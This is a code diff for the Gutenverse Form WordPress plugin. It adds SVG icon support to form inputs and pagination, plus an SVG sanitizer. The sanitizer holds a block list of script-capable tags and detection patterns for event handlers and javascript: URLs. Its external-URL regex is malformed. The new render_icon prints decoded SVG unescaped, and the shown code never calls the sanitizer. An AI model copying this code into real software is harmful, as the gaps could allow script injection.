@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +676,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +700,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-text.php
+++ b/gutenverse-form/includes/style/class-form-input-text.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +676,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +700,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-textarea.php
+++ b/gutenverse-form/includes/style/class-form-input-textarea.php
@@ -397,7 +397,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -483,11 +483,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -555,7 +555,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -579,7 +579,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -615,7 +615,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -639,9 +639,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -689,7 +689,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -713,9 +713,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/lib/dependencies/blocks.asset.php
+++ b/gutenverse-form/lib/dependencies/blocks.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes'), 'version' => '46b95f535c51dae7ed80');
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes'), 'version' => '559a55ac8f6aa1b924b4');
--- a/gutenverse-form/lib/dependencies/form.asset.php
+++ b/gutenverse-form/lib/dependencies/form.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => 'ff1b907ff9cee36cc808');
+<?php return array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '0743550171eaa2b83007');
--- a/gutenverse-form/lib/dependencies/frontend/form-builder.asset.php
+++ b/gutenverse-form/lib/dependencies/frontend/form-builder.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-api-fetch', 'wp-hooks'), 'version' => '0b56319b807e1b99b86f');
+<?php return array('dependencies' => array('wp-api-fetch', 'wp-hooks'), 'version' => 'f1bfe33714d2ba01b091');
--- a/gutenverse-form/lib/dependencies/frontend/input-date.asset.php
+++ b/gutenverse-form/lib/dependencies/frontend/input-date.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'f5817aa23b8606ae6184');
+<?php return array('dependencies' => array(), 'version' => '2370e046ea29efa2ee3b');
--- a/gutenverse-form/lib/dependencies/frontend/input-select.asset.php
+++ b/gutenverse-form/lib/dependencies/frontend/input-select.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '6e25723566701a3a4718');
+<?php return array('dependencies' => array(), 'version' => '59797a5527fef8836b81');
--- a/gutenverse-form/lib/framework/bootstrap.php
+++ b/gutenverse-form/lib/framework/bootstrap.php
@@ -15,7 +15,7 @@
 	return;
 }

-defined( 'GUTENVERSE_FRAMEWORK_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_VERSION', '2.3.2' );
+defined( 'GUTENVERSE_FRAMEWORK_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_VERSION', '2.4.0' );
 defined( 'GUTENVERSE_FRAMEWORK_ASSETS_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_ASSETS_VERSION', '2.1.0' );
 defined( 'GUTENVERSE_FRAMEWORK_DIR' ) || define( 'GUTENVERSE_FRAMEWORK_DIR', __DIR__ );
 defined( 'GUTENVERSE_FRAMEWORK_CLASS_DIR' ) || define( 'GUTENVERSE_FRAMEWORK_CLASS_DIR', GUTENVERSE_FRAMEWORK_DIR . '/includes' );
--- a/gutenverse-form/lib/framework/helper.php
+++ b/gutenverse-form/lib/framework/helper.php
@@ -6,6 +6,71 @@
  * @since 1.0.0
  * @package gutenverse-framework
  */
+if ( ! function_exists( 'gutenverse_is_svg_safe' ) ) {
+	/**
+	 * Sanitizer SVG Content
+	 *
+	 * @return mixed
+	 */
+	function gutenverse_is_svg_safe( $svg ) {
+		libxml_use_internal_errors( true );
+
+		// Prevent XXE attacks
+		$svg = preg_replace( '/<!DOCTYPE.+?>/i', '', $svg );
+
+		$dom = new DOMDocument();
+
+		if ( ! $dom->loadXML( $svg, LIBXML_NONET | LIBXML_NOENT | LIBXML_COMPACT ) ) {
+			return false;
+		}
+
+		$xpath = new DOMXPath( $dom );
+
+		/**
+		 * ❌ Forbidden SVG elements
+		 */
+		$forbidden_tags = array(
+			'script',
+			'foreignObject',
+			'iframe',
+			'object',
+			'embed',
+			'audio',
+			'video',
+		);
+
+		foreach ( $forbidden_tags as $tag ) {
+			if ( $xpath->query( '//*[local-name()="' . $tag . '"]' )->length > 0 ) {
+				return false;
+			}
+		}
+
+		/**
+		 * ❌ Forbidden attributes
+		 * - Event handlers (onload, onclick, etc)
+		 * - javascript: URLs
+		 */
+		foreach ( $xpath->query( '//@*' ) as $attr ) {
+			if (
+			preg_match( '/^on/i', $attr->nodeName ) ||
+			preg_match( '/javascript:/i', $attr->nodeValue )
+			) {
+				return false;
+			}
+		}
+
+		/**
+		 * ❌ Disallow external references
+		 */
+		foreach ( $xpath->query( '//@*' ) as $attr ) {
+			if ( preg_match( '/^(https?:)?///i', trim( $attr->nodeValue ) ) ) {
+				return false;
+			}
+		}
+
+		return true;
+	}
+}

 if ( ! function_exists( 'gutenverse_get_event_banner' ) ) {
 	/**
--- a/gutenverse-form/lib/framework/includes/block/class-block-abstract.php
+++ b/gutenverse-form/lib/framework/includes/block/class-block-abstract.php
@@ -254,4 +254,104 @@

 		return $def;
 	}
+
+	/**
+	 * Render Icon
+	 *
+	 * @param string $type                Icon type.
+	 * @param string $icon                Icon class.
+	 * @param string $svg                 SVG data.
+	 * @param string $element_id          Element ID.
+	 * @param array  $icon_gradient       Icon Gradient.
+	 * @param array  $icon_gradient_hover Icon Gradient Hover.
+	 *
+	 * @return string
+	 */
+	protected function render_icon( $type, $icon, $svg, $element_id = '', $icon_gradient = false, $icon_gradient_hover = false ) {
+		if ( 'svg' === $type && ! empty( $svg ) ) {
+			// phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
+			$svg_data = base64_decode( $svg, true );
+
+			$gradients = '';
+			if ( $icon_gradient || $icon_gradient_hover ) {
+				if ( empty( $element_id ) ) {
+					$element_id = $this->get_element_id();
+				}
+
+				if ( $icon_gradient ) {
+					$gradients .= $this->create_gradient_svg( $icon_gradient, 'iconGradient-' . $element_id );
+				}
+
+				if ( $icon_gradient_hover ) {
+					$gradients .= $this->create_gradient_svg( $icon_gradient_hover, 'iconGradientHover-' . $element_id );
+				}
+			}
+
+			if ( ! empty( $gradients ) ) {
+				$svg_data .= '<svg style="width:0;height:0;position:absolute;" aria-hidden="true" focusable="false"><defs>' . $gradients . '</defs></svg>';
+			}
+
+			return '<div class="gutenverse-icon-svg">' . $svg_data . '</div>';
+		}
+		return '<i aria-hidden="true" class="' . esc_attr( $icon ) . '"></i>';
+	}
+
+	/**
+	 * Create Gradient SVG
+	 *
+	 * @param array  $gradient Gradient data.
+	 * @param string $id       Gradient ID.
+	 *
+	 * @return string
+	 */
+	protected function create_gradient_svg( $gradient, $id ) {
+		$stops = '';
+		if ( isset( $gradient['gradientColor'] ) && is_array( $gradient['gradientColor'] ) ) {
+			foreach ( $gradient['gradientColor'] as $color ) {
+				$stops .= '<stop offset="' . esc_attr( $color['offset'] ) . '" stop-color="' . esc_attr( $color['color'] ) . '"/>';
+			}
+		}
+
+		$type = isset( $gradient['gradientType'] ) ? $gradient['gradientType'] : 'linear';
+
+		if ( 'radial' === $type ) {
+			$radial_pos = isset( $gradient['gradientRadial'] ) ? $gradient['gradientRadial'] : 'center center';
+			$pos        = explode( ' ', $radial_pos );
+			$cx         = '50%';
+			$cy         = '50%';
+			$map        = array(
+				'left'   => '0%',
+				'center' => '50%',
+				'right'  => '100%',
+				'top'    => '0%',
+				'bottom' => '100%',
+			);
+
+			foreach ( $pos as $p ) {
+				if ( isset( $map[ $p ] ) ) {
+					if ( in_array( $p, array( 'left', 'right' ), true ) ) {
+						$cx = $map[ $p ];
+					} elseif ( in_array( $p, array( 'top', 'bottom' ), true ) ) {
+						$cy = $map[ $p ];
+					}
+				}
+			}
+
+			return '<radialGradient id="' . esc_attr( $id ) . '" cx="' . $cx . '" cy="' . $cy . '" r="50%" fx="' . $cx . '" fy="' . $cy . '">
+					' . $stops . '
+				</radialGradient>';
+		}
+
+		$angle = isset( $gradient['gradientAngle'] ) ? (float) $gradient['gradientAngle'] : 180;
+		$rad   = ( $angle * pi() ) / 180;
+
+		$x1 = ( 50 - 50 * sin( $rad ) ) . '%';
+		$y1 = ( 50 + 50 * cos( $rad ) ) . '%';
+		$x2 = ( 50 + 50 * sin( $rad ) ) . '%';
+		$y2 = ( 50 - 50 * cos( $rad ) ) . '%';
+
+		return '<linearGradient id="' . esc_attr( $id ) . '" x1="' . $x1 . '" y1="' . $y1 . '" x2="' . $x2 . '" y2="' . $y2 . '">
+					' . $stops . '
+				</linearGradient>';
+	}
 }
--- a/gutenverse-form/lib/framework/includes/block/class-post-abstract.php
+++ b/gutenverse-form/lib/framework/includes/block/class-post-abstract.php
@@ -357,9 +357,11 @@
 		$result           = array();
 		$args             = array();

-		$args['post_type'] = $attr['postType'];
+		$args['post_type']   = $attr['postType'];
+		$args['post_status'] = 'publish';

 		$is_normal_mode = isset( $attr['paginationMode'] ) && in_array( $attr['paginationMode'], array( 'normal-prevnext', 'normal-number' ), true );
+
 		// For native pagination modes, read from URL query parameter.
 		if ( $is_normal_mode ) {
 			$paged = get_query_var( 'paged' ) ? get_query_var( 'paged' ) : get_query_var( 'page' );
@@ -534,8 +536,6 @@
 			$args['monthnum'] = $attr['monthnum'];
 		}

-		$args['post_status'] = 'publish';
-
 		$args = apply_filters( 'gutenverse_default_query_args', $args, $attr );

 		// Query.
@@ -554,7 +554,7 @@
 			'next'       => self::has_next_page( $query->found_posts, $args['paged'], $args['offset'], $attr['numberPost'], $total_next ),
 			'prev'       => self::has_prev_page( $args['paged'] ),
 			'page'       => $args['paged'],
-			'total_page' => self::count_total_page( $attr['paginationMode'], $query->found_posts, $args['paged'], $args['offset'], $attr['numberPost'], $attr['paginationNumberPost'] > 0 ? $attr['paginationNumberPost'] : 1 ),
+			'total_page' => self::count_total_page( isset( $attr['paginationMode'] ) ? $attr['paginationMode'] : '', $query->found_posts, $args['paged'], $args['offset'], $attr['numberPost'], $attr['paginationNumberPost'] > 0 ? $attr['paginationNumberPost'] : 1 ),
 		);
 	}

@@ -717,21 +717,28 @@
 	protected function render_pagination( $prev = false, $next = false, $total = 1, $page = 1 ) {
 		$output          = '';
 		$icon            = esc_attr( $this->attributes['paginationIcon'] ?? '' );
+		$icon_type       = isset( $this->attributes['paginationIconType'] ) ? esc_attr( $this->attributes['paginationIconType'] ) : 'icon';
+		$icon_svg        = isset( $this->attributes['paginationIconSVG'] ) ? $this->attributes['paginationIconSVG'] : '';
 		$icon_position   = esc_attr( $this->attributes['paginationIconPosition'] ?? null );
 		$pre_next_text   = esc_attr( $this->attributes['paginationPrevNextText'] ?? '' );
 		$prev_inner_text = esc_attr( $this->attributes['paginationPrevText'] ?? '' );
 		$next_innet_text = esc_attr( $this->attributes['paginationNextText'] ?? '' );
 		$prev_icon       = esc_attr( $this->attributes['paginationPrevIcon'] ?? '' );
+		$prev_icon_type  = isset( $this->attributes['paginationPrevIconType'] ) ? esc_attr( $this->attributes['paginationPrevIconType'] ) : 'icon';
+		$prev_icon_svg   = isset( $this->attributes['paginationPrevIconSVG'] ) ? $this->attributes['paginationPrevIconSVG'] : '';
 		$next_icon       = esc_attr( $this->attributes['paginationNextIcon'] ?? '' );
+		$next_icon_type  = isset( $this->attributes['paginationNextIconType'] ) ? esc_attr( $this->attributes['paginationNextIconType'] ) : 'icon';
+		$next_icon_svg   = isset( $this->attributes['paginationNextIconSVG'] ) ? $this->attributes['paginationNextIconSVG'] : '';

 		if ( in_array( $this->attributes['paginationMode'], array( 'loadmore', 'scrollload' ), true ) && $next ) {
 			$output = '<span data-load="' . esc_attr( $this->attributes['paginationLoadmoreText'] ) . '" data-loading="' . esc_attr( $this->attributes['paginationLoadingText'] ) . '"> ' . esc_attr( $this->attributes['paginationLoadmoreText'] ) . '</span>';

-			if ( ! empty( $icon ) ) {
+			if ( ! empty( $icon ) || 'svg' === $icon_type ) {
+				$icon_html = $this->render_icon( $icon_type, $icon, $icon_svg );
 				if ( 'before' === $icon_position ) {
-					$output = '<i aria-hidden="true" class="' . $icon . '"></i>' . $output;
+					$output = $icon_html . $output;
 				} else {
-					$output = $output . '<i aria-hidden="true" class="' . $icon . '"></i>';
+					$output = $output . $icon_html;
 				}
 			}

@@ -743,12 +750,12 @@
 			$next = $next ? '' : 'disabled';
 			$prev = $prev ? '' : 'disabled';

-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . $prev_inner_text;
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . $prev_inner_text;
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$prev_link = 1 === $page ? '' : '<a href="#" class="btn-pagination prev ' . esc_attr( $prev ) . '" title="' . $prev_inner_text . '">' . $prev_text . '</a>';
@@ -762,12 +769,12 @@
 		}

 		if ( 'number' === $this->attributes['paginationMode'] && $total > 1 ) {
-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . esc_html__( 'Prev', 'gutenverse-form' );
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . esc_html__( 'Prev', 'gutenverse-form' );
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$output = '<div class="guten_block_nav" data-page="' . $page . '">';
@@ -815,12 +822,12 @@
 			$prev_class = $prev ? '' : 'disabled';
 			$next_class = $next ? '' : 'disabled';

-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . $prev_inner_text;
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . $prev_inner_text;
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$prev_link = 1 === $page ? '' : sprintf(
@@ -852,12 +859,12 @@

 		// Normal Number Pagination (Native).
 		if ( 'normal-number' === $this->attributes['paginationMode'] && $total > 1 ) {
-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
